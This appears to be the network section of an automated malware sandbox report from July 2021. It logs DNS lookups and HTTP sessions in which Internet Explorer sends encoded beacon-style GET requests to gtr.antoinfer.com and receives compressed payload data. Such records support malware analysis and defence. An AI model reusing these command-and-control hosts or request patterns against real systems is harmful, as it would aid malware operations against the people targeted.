                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Jul 8, 2021 15:45:12.538357973 CEST192.168.2.38.8.8.80x921fStandard query (0)free.mynowministries.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:46:46.216243029 CEST192.168.2.38.8.8.80xffebStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:46:47.222793102 CEST192.168.2.38.8.8.80xffebStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:30.710268974 CEST192.168.2.38.8.8.80x45dcStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:32.668920040 CEST192.168.2.38.8.8.80xf55Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:35.493366003 CEST192.168.2.38.8.8.80xb150Standard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:37.660630941 CEST192.168.2.38.8.8.80x314cStandard query (0)gtr.antoinfer.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Jul 8, 2021 15:45:12.660362959 CEST8.8.8.8192.168.2.30x921fNo error (0)free.mynowministries.com162.241.253.78A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:46:47.505951881 CEST8.8.8.8192.168.2.30xffebNo error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:46:50.491420984 CEST8.8.8.8192.168.2.30xffebNo error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:30.725452900 CEST8.8.8.8192.168.2.30x45dcNo error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:32.682585955 CEST8.8.8.8192.168.2.30xf55No error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:35.783593893 CEST8.8.8.8192.168.2.30xb150No error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                                                                                                                                                            Jul 8, 2021 15:47:37.674045086 CEST8.8.8.8192.168.2.30x314cNo error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • gtr.antoinfer.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.349755165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:46:47.694397926 CEST6994OUTGET /7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:46:48.628479958 CEST6995INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:46:48 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9b c7 72 a3 40 14 45 3f 88 05 19 c4 92 8c c8 39 ed c8 39 67 be 7e e4 29 ef 4c c9 88 ee 7e f7 9e 53 b2 e8 32 af 25 08 fd 9a e7 35 eb a9 e8 89 16 8b 3a cb 84 8f e5 ee d3 54 a8 9b ef 63 04 df 2c dd 96 75 37 a2 f3 eb c5 b6 49 1a e2 24 9c 42 da 4c ed 91 c8 5b dd 99 06 25 54 67 ff 04 bd 67 62 a6 d1 95 db 77 df 9c 3c 26 b5 e4 4b 24 6a 08 0b d4 30 42 29 89 a4 b3 a5 4e b0 d4 d2 f4 7e a5 96 cd 80 24 e0 9a f5 88 7c fd 87 fe 18 23 14 14 10 81 e3 3b c0 9b 3a f9 61 3a 70 24 3f 2c 51 6d 72 28 2c 09 f0 bb 48 d7 60 a2 68 3d 71 7f ef 86 a8 f8 25 8c 9e 8c 2c b4 16 91 7b a9 75 90 4e d2 d4 34 03 46 a0 9e eb 78 06 5a 51 ab 40 77 ed bc 65 8f 7d b6 6f 16 6c ba 34 12 56 36 b3 94 17 d0 46 63 49 18 c3 22 4b b5 0d 2b 83 0f 89 7d 37 d3 77 4d c6 24 34 a0 5c 8e 80 44 da 66 b0 db 06 00 ee 8a 7c 70 2a 5b c8 16 40 d8 e0 9a 14 72 cc ae 4b e9 61 35 b7 f1 4f 1b 0b 7c 9c 72 40 2a ac 6c b6 6b 00 41 48 07 a0 60 e2 e3 b0 7b 10 ae ab 1a c4 37 57 04 f2 ce f5 f9 24 7c c0 3e 7f 0a a2 62 bf 6e 7c ef 7e 26 72 e1 70 87 a8 10 d4 16 f4 91 ca f2 92 fb 0f ed 39 9e a6 e8 f1 6a b4 b9 13 18 5f 0f 26 88 d2 c8 b6 05 6c be 61 12 9b a6 0c 37 4a c3 46 66 46 c5 65 67 26 27 e8 e2 13 16 6f d2 bd 2e fe 57 d1 17 ba 76 0d 3f 3b b7 d4 0f e9 c1 3f d5 dc 75 ec 31 93 42 e3 4b ae 5f 70 c8 c5 6c 7b f7 f2 fa 4a 38 41 aa 64 1f 3e f6 76 b2 8e f7 48 40 5c e3 cf 80 43 17 fd 59 05 4f 50 1e 4d b6 eb 0e d1 fa da 21 6d b2 54 58 e5 ab 53 b6 aa 80 d8 f2 75 97 db be eb c0 33 4b b7 f1 14 c9 3a 6e da 05 99 35 7c 3f fb 84 34 15 4a aa 76 cc 5a bc b9 be a8 5f cd 72 b8 9d a5 10 18 2e 68 68 a8 12 7b 9c 12 a6 b9 54 f5 fc 23 cd 15 0a 2f 8f f3 2a ea 76 dd fd 86 1a 16 d1 31 7d d9 e5 18 96 7c b6 af 54 b0 7b b8 06 d2 70 e6 65 63 ed 45 9b 7d 9d 09 a6 0d fd 2d f8 19 7d 9e e4 c0 6d c5 5b 0a b0 0d 61 d9 d4 07 ea 7e b1 34 6a ed e3 ab ec 2f 76 06 32 54 b5 3a e4 84 85 c1 e1 1b 87 b1 40 bb 93 d5 ba 4e ec c1 18 17 43 81 6b 1e 5d 39 90 cf 31 64 5d 06 82 ba 76 cf 72 0e 9c 5b b3 15 12 47 b1 9d 79 3c f5 68 99 49 32 c3 e9 39 1d 48 8e b8 e1 76 dd bb 3c 87 7f b5 6f b9 cf b3 2c 12 f3 9a 2d 2e 3f 4f 91 bc e5 af 61 17 82 7d ad 87 f7 75 f2 4d c9 38 4f 44 8e eb 5d 44 f5 77 ba 0a de 2d 61 56 45 fb 11 65 c5 4a b3 7d b7 c3 46 2e 0e cf 63 6f a7 d2 f7 ed 31 1e a1 10 72 b7 16 bd d6 ed 90 07 8c 97 73 95 a0 b1 69 44 d0 e3 f8 2d c3 f1 dc 7e 1e f7 77 83 f3 22 f5 72 af 07 b6 25 39 0a 07 4f 2f 08 25 f5 d4 0d 55 7d 82 12 48 20 44 74 b6 71 60 ba 81 3a 1f c6 9a 6f cb a6 25 05 25 e4 79 a7 f8 be e8 6f 47 b9 2d 69 88 81 61 fc 09 4b ca c8 05 f2 ac 83 97 dc 9d bf 39 6b ed 8f 73 c9 94 d3 84 22 12 d4 c1 fb 51 c0 fe 42 6a 66 34 6b dd 1b 3e 59 63 9c 3c d2 f2 78 a6 fa 6a 14 79 dd da a4 83 e5 c1 72 f1 a9 55 69 d5 50 b1 76 a4 24 78 5c 84 9b 2f 42 ca 1a c6 67 bd af 8f 2c b8 1d 1b 99 06 1b 48 91 81 29 1c 7a fc 78 36 70 a8 55 f4 04 be 6e 2d f0 27 10 ab 2f 58 53 5a 4b 58 13 89 4c 03 e1 35 2a 96 45 43 a9 a6 2f 75 11 f4 94 da f7 74 7a 2e 46 59 0d 1c f7 c2 9c 9d c5 6c e4 ec 91 7e 58 32 d4 1f cb 03 c1 f9 e3 9b 59 3c fb ba 3d 0b ca 4b 9f 46 9e 22 23 f7 29 fc 10 a1 8b a0 77 51 9e ed 64 81 6f 93 df 14 8e 2b 31 ce 58 e8 af 38 83 8d d3 20 d5 5d 45 92 c6 59
                                                                                                                                                            Data Ascii: 2000r@E?99g~)L~S2%5:Tc,u7I$BL[%Tggbw<&K$j0B)N~$|#;:a:p$?,Qmr(,H`h=q%,{uN4FxZQ@we}ol4V6FcI"K+}7wM$4\Df|p*[@rKa5O|r@*lkAH`{7W$|>bn|~&rp9j_&la7JFfFeg&'o.Wv?;?u1BK_pl{J8Ad>vH@\CYOPM!mTXSu3K:n5|?4JvZ_r.hh{T#/*v1}|T{pecE}-}m[a~4j/v2T:@NCk]91d]vr[Gy<hI29Hv<o,-.?Oa}uM8OD]Dw-aVEeJ}F.co1rsiD-~w"r%9O/%U}H Dtq`:o%%yoG-iaK9ks"QBjf4k>Yc<xjyrUiPv$x\/Bg,H)zx6pUn-'/XSZKXL5*EC/utz.FYl~X2Y<=KF"#)wQdo+1X8 ]EY


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.349754165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:46:50.205321074 CEST7200OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:46:50.737088919 CEST7201INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:46:50 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.349757165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:30.909945011 CEST7205OUTGET /xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUVAWE43KR_2BAaOOd/VFdvQg3iI5nNB7ro/WwH2QRd3S4Jpyvs/BAGj3S8XfXokbtiE7i/hiopX3wKc/HclUJ6ir4iZ2Wbahh_2F/U4T4cSpeeoulqiraG2L/OcnB_2BpDFDp4gpBC5Tkhs/w68xYDIGC4qQh/4p7XqKDy/ZmjFv4NCLUhiS0t8WoyKwxb/hab8TjugII/SNATkC5REfp7kWCrA/g3JBPajXKX1i/qwbd_2FPu7J/lLmh_2BCbPNt2x/W33zXC7gkL52CnQJHgKW5/o596c7z HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:31.798994064 CEST7207INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:31 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9b c7 72 a3 40 14 45 3f 88 05 19 c4 92 8c c8 39 ed c8 39 67 be 7e e4 29 ef 4c c9 88 ee 7e f7 9e 53 b2 e8 32 af 25 08 fd 9a e7 35 eb a9 e8 89 16 8b 3a cb 84 8f e5 ee d3 54 a8 9b ef 63 04 df 2c dd 96 75 37 a2 f3 eb c5 b6 49 1a e2 24 9c 42 da 4c ed 91 c8 5b dd 99 06 25 54 67 ff 04 bd 67 62 a6 d1 95 db 77 df 9c 3c 26 b5 e4 4b 24 6a 08 0b d4 30 42 29 89 a4 b3 a5 4e b0 d4 d2 f4 7e a5 96 cd 80 24 e0 9a f5 88 7c fd 87 fe 18 23 14 14 10 81 e3 3b c0 9b 3a f9 61 3a 70 24 3f 2c 51 6d 72 28 2c 09 f0 bb 48 d7 60 a2 68 3d 71 7f ef 86 a8 f8 25 8c 9e 8c 2c b4 16 91 7b a9 75 90 4e d2 d4 34 03 46 a0 9e eb 78 06 5a 51 ab 40 77 ed bc 65 8f 7d b6 6f 16 6c ba 34 12 56 36 b3 94 17 d0 46 63 49 18 c3 22 4b b5 0d 2b 83 0f 89 7d 37 d3 77 4d c6 24 34 a0 5c 8e 80 44 da 66 b0 db 06 00 ee 8a 7c 70 2a 5b c8 16 40 d8 e0 9a 14 72 cc ae 4b e9 61 35 b7 f1 4f 1b 0b 7c 9c 72 40 2a ac 6c b6 6b 00 41 48 07 a0 60 e2 e3 b0 7b 10 ae ab 1a c4 37 57 04 f2 ce f5 f9 24 7c c0 3e 7f 0a a2 62 bf 6e 7c ef 7e 26 72 e1 70 87 a8 10 d4 16 f4 91 ca f2 92 fb 0f ed 39 9e a6 e8 f1 6a b4 b9 13 18 5f 0f 26 88 d2 c8 b6 05 6c be 61 12 9b a6 0c 37 4a c3 46 66 46 c5 65 67 26 27 e8 e2 13 16 6f d2 bd 2e fe 57 d1 17 ba 76 0d 3f 3b b7 d4 0f e9 c1 3f d5 dc 75 ec 31 93 42 e3 4b ae 5f 70 c8 c5 6c 7b f7 f2 fa 4a 38 41 aa 64 1f 3e f6 76 b2 8e f7 48 40 5c e3 cf 80 43 17 fd 59 05 4f 50 1e 4d b6 eb 0e d1 fa da 21 6d b2 54 58 e5 ab 53 b6 aa 80 d8 f2 75 97 db be eb c0 33 4b b7 f1 14 c9 3a 6e da 05 99 35 7c 3f fb 84 34 15 4a aa 76 cc 5a bc b9 be a8 5f cd 72 b8 9d a5 10 18 2e 68 68 a8 12 7b 9c 12 a6 b9 54 f5 fc 23 cd 15 0a 2f 8f f3 2a ea 76 dd fd 86 1a 16 d1 31 7d d9 e5 18 96 7c b6 af 54 b0 7b b8 06 d2 70 e6 65 63 ed 45 9b 7d 9d 09 a6 0d fd 2d f8 19 7d 9e e4 c0 6d c5 5b 0a b0 0d 61 d9 d4 07 ea 7e b1 34 6a ed e3 ab ec 2f 76 06 32 54 b5 3a e4 84 85 c1 e1 1b 87 b1 40 bb 93 d5 ba 4e ec c1 18 17 43 81 6b 1e 5d 39 90 cf 31 64 5d 06 82 ba 76 cf 72 0e 9c 5b b3 15 12 47 b1 9d 79 3c f5 68 99 49 32 c3 e9 39 1d 48 8e b8 e1 76 dd bb 3c 87 7f b5 6f b9 cf b3 2c 12 f3 9a 2d 2e 3f 4f 91 bc e5 af 61 17 82 7d ad 87 f7 75 f2 4d c9 38 4f 44 8e eb 5d 44 f5 77 ba 0a de 2d 61 56 45 fb 11 65 c5 4a b3 7d b7 c3 46 2e 0e cf 63 6f a7 d2 f7 ed 31 1e a1 10 72 b7 16 bd d6 ed 90 07 8c 97 73 95 a0 b1 69 44 d0 e3 f8 2d c3 f1 dc 7e 1e f7 77 83 f3 22 f5 72 af 07 b6 25 39 0a 07 4f 2f 08 25 f5 d4 0d 55 7d 82 12 48 20 44 74 b6 71 60 ba 81 3a 1f c6 9a 6f cb a6 25 05 25 e4 79 a7 f8 be e8 6f 47 b9 2d 69 88 81 61 fc 09 4b ca c8 05 f2 ac 83 97 dc 9d bf 39 6b ed 8f 73 c9 94 d3 84 22 12 d4 c1 fb 51 c0 fe 42 6a 66 34 6b dd 1b 3e 59 63 9c 3c d2 f2 78 a6 fa 6a 14 79 dd da a4 83 e5 c1 72 f1 a9 55 69 d5 50 b1 76 a4 24 78 5c 84 9b 2f 42 ca 1a c6 67 bd af 8f 2c b8 1d 1b 99 06 1b 48 91 81 29 1c 7a fc 78 36 70 a8 55 f4 04 be 6e 2d f0 27 10 ab 2f 58 53 5a 4b 58 13 89 4c 03 e1 35 2a 96 45 43 a9 a6 2f 75 11 f4 94 da f7 74 7a 2e 46 59 0d 1c f7 c2 9c 9d c5 6c e4 ec 91 7e 58 32 d4 1f cb 03 c1 f9 e3 9b 59 3c fb ba 3d 0b ca 4b 9f 46 9e 22 23 f7 29 fc 10 a1 8b a0 77 51 9e ed 64 81 6f 93 df 14 8e 2b 31 ce 58 e8 af 38 83 8d d3 20 d5 5d 45 92 c6 59
                                                                                                                                                            Data Ascii: 2000r@E?99g~)L~S2%5:Tc,u7I$BL[%Tggbw<&K$j0B)N~$|#;:a:p$?,Qmr(,H`h=q%,{uN4FxZQ@we}ol4V6FcI"K+}7wM$4\Df|p*[@rKa5O|r@*lkAH`{7W$|>bn|~&rp9j_&la7JFfFeg&'o.Wv?;?u1BK_pl{J8Ad>vH@\CYOPM!mTXSu3K:n5|?4JvZ_r.hh{T#/*v1}|T{pecE}-}m[a~4j/v2T:@NCk]91d]vr[Gy<hI29Hv<o,-.?Oa}uM8OD]Dw-aVEeJ}F.co1rsiD-~w"r%9O/%U}H Dtq`:o%%yoG-iaK9ks"QBjf4k>Yc<xjyrUiPv$x\/Bg,H)zx6pUn-'/XSZKXL5*EC/utz.FYl~X2Y<=KF"#)wQdo+1X8 ]EY


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.349759165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:32.851699114 CEST7370OUTGET /k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K HTTP/1.1
                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:33.792424917 CEST7414INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:33 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 92 83 50 10 45 3f 88 05 6e 4b 5c 82 3b ec 70 d7 e0 5f 3f 99 9a 75 0a e8 bc be f7 9c 0a e3 22 46 69 4a 89 0d bf 62 27 06 5f dc 34 68 5b b7 0f 81 0d 5d cc 80 e5 82 22 63 e1 ba e3 36 77 6c 8c 96 91 d7 61 a2 07 ea a8 43 79 2a 30 b0 b4 aa 83 50 87 a1 be b8 b2 96 35 fc a5 5e a8 65 97 05 6a 03 3f 3b a3 9c a0 b8 9b 23 79 82 6a 69 f2 e2 c1 c4 96 61 34 d0 04 31 db d6 56 ed cb de c5 3e 77 af 31 80 9a f3 e3 4e 9b ee 39 67 54 ba 17 82 aa 5b 94 fd cd 9a ed 1b 69 74 3d d7 85 4b e9 b8 21 df 46 fa 38 9d 5d ed 78 28 97 26 5c 50 5e d0 2e d1 ad 36 ba 60 2b 5e e7 83 a9 59 56 2e 61 06 4b 6d 91 3c 1b 71 f6 c5 da 09 9c ee 3b 5e bb 5c 1a ba 82 32 b9 6b c8 54 88 12 81 a5 e2 5d df 70 b3 09 0d d6 08 94 1d 83 3a 92 3e 0a ed f7 20 20 1f d7 c2 f2 5b 5b b6 e9 29 71 0e f1 d0 98 40 48 b7 ca ba c5 0c 47 75 57 70 94 09 24 38 50 61 ec b7 6f 9d aa 4f 84 8f ab 74 d0 83 6e b9 b0 7f b7 da 37 ac 8f 1e 73 69 36 ad 37 5b a9 d7 bb ef 0e 21 c8 3d 55 42 78 7b 1c 23 7e e4 62 86 b7 ba df fa 16 32 35 11 86 48 4a e6 cd a0 98 5d 07 a7 c8 da 8d 69 0a aa b7 6d a8 3a 8d a3 88 e6 6c 7b 69 4f a3 bb ff 60 b2 ad 9c 1a e3 12 bc 22 46 35 62 9c 54 06 14 cf 5c b3 62 17 5c 1e 2c 30 70 e3 83 12 73 69 83 d6 1c 9e 3d 4c f6 4b f4 78 c5 10 bc f9 d1 04 13 99 30 00 21 89 64 24 7f 5f 8d 7c e7 d4 c0 87 b9 f4 00 56 99 34 f9 05 36 2a 7e 2e 32 00 1d 97 c3 4d 5c a0 a4 d8 8d cd 8f 3f c1 2a 54 b6 23 1a e8 9f 62 3c ef e3 61 fa 27 fb dd e7 96 89 19 37 d6 58 e2 57 ca e4 7c 83 68 66 b5 a7 69 9d 27 9d 98 d8 d0 c8 84 98 e1 54 9a 48 5b 12 f6 ee ab 6e e1 9b 98 ed 34 19 2f b0 78 58 ab c2 70 b0 6c 80 bf ed 30 8d 4f 89 22 ee 74 83 38 66 a5 38 8e 5c 96 37 08 65 03 4d 5f a3 74 4d 7c ae c5 37 a7 7c 2e 4e 00 ea 98 c2 61 63 ff ac 83 86 c7 9b 0b a0 92 d9 1d e4 5e dc fe 70 64 6e e3 7f 88 de 23 6a 5c 51 6b 0b ab 0b 1e 1b a6 6e aa 95 33 8b e1 b3 75 0d f9 2b 10 2d 54 b3 1f da 4b 89 4a 60 22 59 ac e1 e9 ec 49 3e 88 2d 72 97 63 5f 41 dc b9 df f6 fb 3d dc e2 6c 6f 1d 56 10 98 77 6d eb 31 22 e7 03 03 2e 99 a1 e3 6f 16 4b 1d ec 57 05 63 8b fa 19 ed 11 2a b1 c4 7c 28 ae f0 95 5a 61 a5 bc ce 4f fd 61 c1 d4 df 00 5c 7b 11 2f 56 9f 4c ba ef 23 de c5 7e df e0 a0 9e 9b 0d a6 52 cb b2 d2 5d af 93 c1 ba 99 70 6a 49 e1 2e ac b9 52 98 c7 5c a0 a7 5e 54 87 62 a4 da 40 b7 8f 26 0b 07 6e 9b 14 07 86 ce 01 4e 1f 0b 61 83 d3 f0 ae 29 42 33 28 0c c2 a8 7d 90 d2 33 55 52 84 4a d6 b7 d7 2a 27 e5 55 f3 b5 e7 24 1d 8e 00 3b 95 e4 8e 5d 87 c6 70 41 bd 8f f7 7b 32 7e 9c c2 42 1e 39 29 f0 7f 4b 4b ef cf b7 77 f9 2b 23 b9 49 01 f6 23 f0 bc af 8e 7e 58 32 af be 5f 44 2f b8 bc 08 47 ad e0 1d 04 db 48 e5 db 48 16 ba d5 46 a7 5a d7 2d 09 24 87 ea a7 d2 32 6a 36 0b 87 b3 aa 80 e3 c5 6d 10 e1 56 f7 10 9e c6 5d c9 9d 71 dd 87 0f f0 9a 78 98 f9 c3 de 2a 02 be b1 51 2f f2 6f df 52 13 c7 41 4e dd ce c1 93 9e 8d cd 16 13 d5 2b b3 4a 27 d0 8d e4 a0 8c 75 e7 09 ee 89 17 98 c9 46 e7 c6 6d 95 92 90 a7 4f 6b 8d 06 cd b6 9d 2f ea aa bf 64 8c 37 98 4f 2a 34 f5 2e 78 4d 43 46 b1 33 f6 c1 36 ef 33 e9 df 44 9e cb eb 7a ce 67 80 f6 59 90 fa 83 9c bc 79 b6 3f 17 63 60 ea 8e 94 df 7a 9d ee 8a 34 30 ad f2 73 a0 02 cd 59 f1 c3 78 61 ca 33 29 65 cd
                                                                                                                                                            Data Ascii: 2000PE?nK\;p_?u"FiJb'_4h[]"c6wlaCy*0P5^ej?;#yjia41V>w1N9gT[it=K!F8]x(&\P^.6`+^YV.aKm<q;^\2kT]p:> [[)q@HGuWp$8PaoOtn7si67[!=UBx{#~b25HJ]im:l{iO`"F5bT\b\,0psi=LKx0!d$_|V46*~.2M\?*T#b<a'7XW|hfi'TH[n4/xXpl0O"t8f8\7eM_tM|7|.Nac^pdn#j\Qkn3u+-TKJ`"YI>-rc_A=loVwm1".oKWc*|(ZaOa\{/VL#~R]pjI.R\^Tb@&nNa)B3(}3URJ*'U$;]pA{2~B9)KKw+#I#~X2_D/GHHFZ-$2j6mV]qx*Q/oRAN+J'uFmOk/d7O*4.xMCF363DzgYy?c`z40sYxa3)e


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.349756165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jul 8, 2021 15:47:33.259176970 CEST7413OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Host: gtr.antoinfer.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jul 8, 2021 15:47:33.771099091 CEST7413INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Thu, 08 Jul 2021 13:47:33 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


